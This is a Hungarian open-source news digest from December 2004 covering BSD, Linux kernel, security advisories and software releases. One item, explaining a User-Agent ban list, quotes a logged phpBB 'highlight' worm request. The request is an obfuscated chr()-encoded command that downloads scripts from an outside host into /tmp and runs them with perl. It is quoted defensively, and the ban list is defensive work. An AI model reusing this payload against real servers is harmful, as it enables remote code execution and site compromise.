Összefoglaló az ünnepek alatti változásokról:

Matthew Dillon folytatja a naplózó (journaling) filerendszer implementálását a DragonFly BSD-be. Ennek látható jele a december 23-i cvs commit. A commit-ban bemutatkozik egy új syscall, a mountctl, amelynek a journaling réteg kezelése lesz a feladata. Jeroen Ruigrok/asmodai commit-olta Kristian Vlaardingerbroek patchét, amely az ICH5-alapú Intel alaplapok 10/100 Ethernet chipset-jéhez nyújt támogatást.

Az AllBSD.org-os Hiroki Sato 6278 csomagot készített a DragonFly-hoz a december 12-i FreeBSD ports alapján. A csomagok elérhetők a következő helyen: ftp://ftp.allbsd.org/pub/DragonFly/ports/i386/packages/

[2004 dec. 22.] USN-45-1 nasm buffer overflow

[2004 dec. 23.] USN-46-1 TIFF library buffer overflow

[2004 dec. 23.] USN-47-1 Linux kernel sebezhetőségek

(vc_resize() egész túlcsordulás; ip_options_get() memória szivárgás)

[2004 dec. 23.] USN-48-1 xpdf, tetex-bin buffer overflow

[2004 dec. 23.] USN-49-1 debmake problémás tempfile kezelés

[2004 dec. 23.] USN-50-1 CUPS buffer overflow

(xpdf-ből származó kód, a hiba lényegében az USN-48-1-el azonos)

[2004 dec. 23.] USN-51-1 tetex-bin "xdvizilla" problémás tempfile kezelés

[2004 dec. 23.] USN-52-1 vim modeline parancsok sebezhetőségeA frissítés menete:

Miután frissítettünk a legfrissebb, 2.6.10-es Linux kernelre, problémáink lehetnek a zárt forrású NVidia driver kernel moduljával.

Firebird 1.5.2 moves into full release!

Megjelent a Firebird névre hallgató relációs adatbázis-kezelő 1.5.2-es verziója. Az RC5 immáron release lett.

Mivel többen kérték, ismét portoltam a minap megjelent 2.6.10-es kernelhez a SuSE által készített Bootsplash patchet.

"Igen....Végre....Megérkezett!!!

Sikerült feltöltenünk az állományt, így mától (csupán 1 napos késéssel) rendelkezésetekre áll. Köszönet ezért Fülöp Dániel-nek.

A szerverről részletesen itt olvashattok.

Ha bármilyen hiba jelentkezik (mert az előfordulhat) itt írhatjátok le annak részleteit regisztráció illetve bejelentkezés után."

Innen tölthető le a fájl

Egy kínai illetőségű biztonsággal foglalkozó csoport exploitot publikált két új, a Microsoft által még nem javított Windows hibára. A figyelmeztető nem sokkal karácsony előtt érkezett, akkor, amikor a cégek és a felhasználók a legkevésbé vannak felkészülve arra, hogy ilyen hibákat javítsanak.

Az egyik hiba a Windows LoadImage függvényében található. A támadó a hibát felhasználhatja arra, hogy megtörje az áldozat gépét, amikor az speciálisan elkészített képeket jelenít meg webhelyről vagy email-ből.A másik sebezhetőség a Windows Help programjában található, és úgy tűnik, hogy minden olyan programot érint, amelyik valamelyik Help filet megnyitja.

Mivel a hiba olyan lib-ben van, amelyet a Windows programok használnak, majdnem az összes böngésző és levelező program sebezhető. A Symantec szerint a hiba eléggé súlyos.

A hiba akkor került napvilágra, mikor azt csütörtökön az Xfocus Team oldalán publikálta. A hibát a VenusTech névre hallgató kínai cég fedezte, és publikálta az interneten.

Általában az összes Windows kiadás érintett. Van amelyik hiba nem érinti a Windows XP SP2-es gépeket, de van olyan, amelyiknek az sem akadály.
Hibaleírások és exploit demok a hibajegyekben itt.

Darren Reed a multiplatformos csomagszűrő IPFilter szerzője karácsonyi ajándékként bejelentette, hogy olyan pachet készített a FreeBSD -currentben levő IPFilter-hez, amellyel többé nincs szükség a ``needs giant'' flagre, és lehetőség nyílik a finomabb lockolásra. Darren szívesen venné, ha valaki komolyabban megnyúzná SMP környezetben az IPFilter-t. A kódban ugyanazt a zárolási mechanizmust alkalmazta, amelyet a Solarisnál és az Irix-nél is, így Darren bízakodó abban a tekintetben, hogy nem okoz az új kód deadlock-ot, de jobb szeretné tesztelve látni.

A bejelentés itt.

A napokban egy új kezdeményezés indult Hammer Of Thyrion néven, amely az eredeti Linux Hexen II - Anvil of Tyrion projekt elsősorban hibajavított, de számos szempontból átdolgozott, továbbfejlesztett változata.

Valamivel több, mint 3 hónap után megjelent az OpenTTD (Transport Tycoon Deluxe klón) következő verziója. A srácok nem tétlenkedtek, a changelog elég hosszú, és ráadásul nem csak a szokásos bugfixek, hanem új funkciók is megjelentek, tokéletesítve többek között a régóta áhított multiplayer részt.Gyorsan fel is tettem és rögtön rákattantam egy netes multi játékra. Ha lehet ilyet mondani ``neten játszva talán még nagyobb buli az egész!''. Nem is szaporítom tovább a szót, ezt ki kell probalni!

Changelog itt,
letölthető innen, honlap itt.

A járványszerű phpBB worm (highlight bug - távoli parancsfuttatás - sorozatos deface) miatt a mai naptól User Agent banlist került bevezetésre a HUP-on. Az ok: az elmúlt napokban olyan nagy mennyiségű exploit indult (többek között) a HUP ellen (is), amennyi a code red óta nem volt.

Az alábbi User Agent-ek a továbbiakban nemkívánatosak a HUP-on, a jutalom 403:Alexibot

asterias

BackDoorBot

Black.Hole

BlackWidow

BlowFish

Bot

BotALot

BuiltBotTough

Bullseye

BunnySlippers

Cegbfeieh

CheeseBot

CherryPicker

ChinaClaw

CopyRightCheck

cosmos

Crescent

Custo

DISCo

DittoSpyder

Download

eCatch

EirGrabber

EmailCollector

EmailSiphon

EmailWolf

EroCrawler

Express

ExtractorPro

EyeNetIE

FlashGet

Foobot

FrontPage

GetRight

GetWeb!

Go!Zilla

Go-Ahead-Got-It

GrabNet

Grafula

Harvest

hloader

HMView

lwp-trivial

HTTrack

humanlinks

ia_archiver

Image

Image

Indy

InfoNaviRobot

InterGET

Internet

JennyBot

JetCar

JOC

Kenjin.Spider

Keyword.Density

larbin

LeechFTP

LexiBot

libWeb/clsHTTP

LinkextractorPro

LinkScan/8.1a.Unix

LinkWalker

Mass

Mata.Hari

Microsoft.URL

MIDown

MIIxpc

Mister

moget

Mozilla/3.Mozilla/2.01

Mozilla.*NEWT

Navroad

NearSite

NetAnts

NetMechanic

NetSpider

Net

NetZIP

NICErsPRO

NPbot

Octopus

Offline

Offline

Openfind

PageGrabber

Papa

pavuk

pcBrowser

ProPowerBot/2.14

ProWebWalker

QueryN.Metasearch

RealDownload

ReGet

RepoMonkey

RMA

SiteSnagger

SlySearch

SmartDownload

SpankBot

spanner

SuperBot

SuperHTTP

Surfbot

suzuran

Szukacz/1.4

tAkeOut

Teleport

Telesoft

TurnitinBot/1.5

The.Intraformant

TheNomad

TightTwatBot

Titan

toCrawl/UrlDispatcher

True_Robot

turingos

URLy.Warning

VCI

VoidEYE

Web

Web

WebAuto

WebBandit

WebCopier

WebEMailExtrac.*

WebEnhancer

WebFetch

WebGo

Web.Image.Collector

WebLeacher

WebmasterWorldForumBot

WebReaper

WebSauger

Website

Website

Webster.Pro

WebStripper

WebWhacker

WebZIP

Widow

[Ww]eb[Bb]andit

WWWOFFLE

WWW-Collector-E

Xaldon

Xenu's

Zeus

Példa a próbálkozásra:

host.*.net - - [25/Dec/2004:22:39:51 +0100] "GET /modules.php?name=Forums&highlight=%2527%252esystem

(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr

(116)%252echr(109)%252echr(112)%252echr(59)%252echr

(119)%252echr(103)%252echr(101)%252echr(116)%252echr

(32)%252echr(119)%252echr(119)%252echr(119)%252echr

(46)%252echr(119)%252echr(101)%252echr(98)%252echr

(109)%252echr(97)%252echr(115)%252echr(116)%252echr

(101)%252echr(114)%252echr(45)%252echr(105)%252echr

(116)%252echr(46)%252echr(105)%252echr(116)%252echr

(47)%252echr(116)%252echr(101)%252echr(114)%252echr

(114)%252echr(111)%252echr(114)%252echr(98)%252echr

(111)%252echr(116)%252echr(46)%252echr(116)%252echr

(120)%252echr(116)%252echr(59)%252echr(112)%252echr

(101)%252echr(114)%252echr(108)%252echr(32)%252echr

(116)%252echr(101)%252echr(114)%252echr(114)%252echr

(111)%252echr(114)%252echr(98)%252echr(111)%252echr

(116)%252echr(46)%252echr(116)%252echr(120)%252echr

(116)%252echr(59)%252echr(119)%252echr(103)%252echr

(101)%252echr(116)%252echr(32)%252echr(119)%252echr

(119)%252echr(119)%252echr(46)%252echr(119)%252echr

(101)%252echr(98)%252echr(109)%252echr(97)%252echr

(115)%252echr(116)%252echr(101)%252echr(114)%252echr

(45)%252echr(105)%252echr(116)%252echr(46)%252echr

(105)%252echr(116)%252echr(47)%252echr(116)%252echr

(101)%252echr(114)%252echr(114)%252echr(111)%252echr

(114)%252echr(119)%252echr(111)%252echr(114)%252echr

(109)%252echr(46)%252echr(116)%252echr(120)%252echr

(116)%252echr(59)%252echr(112)%252echr(101)%252echr

(114)%252echr(108)%252echr(32)%252echr(116)%252echr

(101)%252echr(114)%252echr(114)%252echr(111)%252echr

(114)%252echr(119)%252echr(111)%252echr(114)%252echr

(109)%252echr(46)%252echr(116)%252echr(120)%252echr

(116))%252e%2527 HTTP/1.0" 403 213 "-" "lwp-trivial/1.41"

Ha valaki úgy érzi, hogy hibásan kap 403-as hibát, az írjon egy levelet a trey () hup ! hu címre!

Megjelent a GNOME desktop (és fejlesztői) környezet soron következő fejlesztői snapshotja. Annak ellenére, hogy lefordítható és használható, inkább csak tesztelési és hackelési célokat szolgál. Bővebben itt.

Andrea Arcangeli egy olyan patchsettel állt elő, amelynek célja a 2.6-os Linux kernel VM-jének (virtuális memória alrendszer) javítása. A patchet 4 részből áll. A javítások közt van a régóta problémás OOM Killer javítása is. A 4 patchból álló set első tagja a protect-pids patch, amelynek segítségével adminisztrálni lehet az OOM Killer-t, míg a negyedik maga a core OOM killer javítás. Andrea azt szeretné, ha a változások beolvasztásra kerülnének a mainline kernelbe.

A patchek, és a magyarázatok itt:

VM fixes [1/4]

VM fixes [2/4]

VM fixes [3/4]

VM fixes [4/4]

[2004. dec. 24.] DSA-618 imlib - buffer overflows, integer overflows

[2004. dec. 24.] DSA-617 tiff - insufficient input validation

[2004. dec. 23.] DSA-616 netkit-telnet-ssl - format string

A frissítésről szóló FAQ-nk itt.

Új hírek az ATI linuxos, zárt forrású driveréről. A Rage3D fórumába postázta az ATI-s Matthew Tippet a legfrissebb híreket, miszerint számos stabilitási javítást végeztek a driveren. A munka folytán javulás / változás várható AGP, PCIe és AMD64 fronton.Sajnos a driver csak jövő évben jelenik meg... Néhány újdonság előzetesként:

- AMD64/EM64T Support

- XOrg 6.8 Support

- GLSL

- PCIe stability improvements

Természetesen nem marad el a Windows driverhaz való szinkronizálás sem.

Bővebben itt.

Karácsony alkalmából Linus kiadta a 2.6.10-ez stabil kernelt, hogy senki ne unatkozzon az ünnepek alatt.

"Opera next link"

Tegnap megjelent az Opera böngésző 8-as verziójának első publikus betaja. A kiadás egyelőre csak Windowsra érhető el, de a bejelentés szerint 2005 elejére várható a többi támogatott platformra is.Az új funkciók között sokkal jobb RSS kezelés, automatikus frissítés-ellenőrzés, könnyebb telepítés, letisztul felhasználói felület és hang kimenet / bemenet szerepel (többek közt).

A misztikus hang ki/be nem jelent egyebet, mint bizonyos oldalakon való hangvezérelt vásárlást, és lehetőséget arra, hogy a felhasználó beszédparancsokkal utasíthassa a böngészőt működésre. Például a böngésző ``megérti'' a szóban kiadott "Opera next link," "Opera back," és "Opera speak" utasításokat. Hurrá! Már csak ez hiányzott :-D

Bővebben a bejelentésben itt.

Második születésnapját ünnepli az Epiphany névre hallgató GNOME-os böngésző. 2002. december 25-én jelentette be agyszüleményét a világnak Marco Pesenti Gritti. Boldog születésnapot! Bővebben itt.

(Használja egyáltalán valaki?)

Megjelent az XFce névre hallgató, unix rendszerekhez készült, GTK+ toolkit-et használó, a Freedesktop specifikációit követő desktop környezet következő RC kiadása.

Az elmúlt napokban a NetBSD projekt anoncvs (anoncvs.netbsd.org) szervere random memória hibákkal küzdött. A szervert leállították, és addig nem is indul újra, amíg nem találnak a vas helyett másikat, vagy a jelenlegit meg nem javítják.Addig is a szükséges anyagokat .tar file formájában le lehet tölteni az ftp.netbsd.org-ról. A napi -current .tar filejai naponta frissítésre kerülnek, és megtalálhatók a /pub/NetBSD/NetBSD-current könyvtárban. A NetBSD csapat egy bejelentést fog tenni, ha a szolgáltatás újraindul.

Bővebben itt.

Megjelent az egyik "legjobb" levelezőprogram végleges, 1.0-ás változata. Ez nem más, mint a Sylpheed. Kicsi, könnyű, gyors, GTK1-re épül. Kezeli a POP3, IMAP protokollokat, SMTP, SSL, GPG támogatás is megtalálható benne. Érdemes egy próbát tenni vele.

5 hónap szünet után tegnap megjelent az MPlayer 1.0pre6 verziója. A ChangeLog jó hosszú, megtekinthető az MPlayer honlapján.

Megjelent a Novell Open Enterprise Server nyílvános beta verziója. Ez az első Novell termék, amely dualplatformos: tartalmazza a tradicionális NetWare és a SUSE Linux Enterprise Server operációs rendszereket, oly módon, hogy ezeknek közös felügyeleti felületet biztosít.

Novell Open Enterprise Server honlap

Novell Open Enterprise Server letöltés

Novell Open Enterprise Server dokumentáció

Novell Open Enterprise Server Coolsoutions

A C|net oldalán olvasható egy elemzés (az elemzést a HoneyNet Project készítette) arról, hogy a nem patchelt Linux rendszerek tovább bírják megtörés nélkül az Interneten, mint a Microsoft által gyártott Windows rendszerek.Korábban már számos beszámoló, elemzés jelent meg arról, hogy a Windows (mindenféle patch, javítócsomag, stb. nélkül) alig 4-5 percig bírja ki (például itt) az Internetről jövő támadásokat. A C|net-nél nagyító alá vették a helyzetet. Az M$ természetesen tagadja, hogy ilyen kevés ideig bírná a rendszere..



Az elemzés itt.

Mi, open source felhasználók, nagyon sokat beszélünk arról, hogy miért jó a Firefox. De az éremnek két oldala van.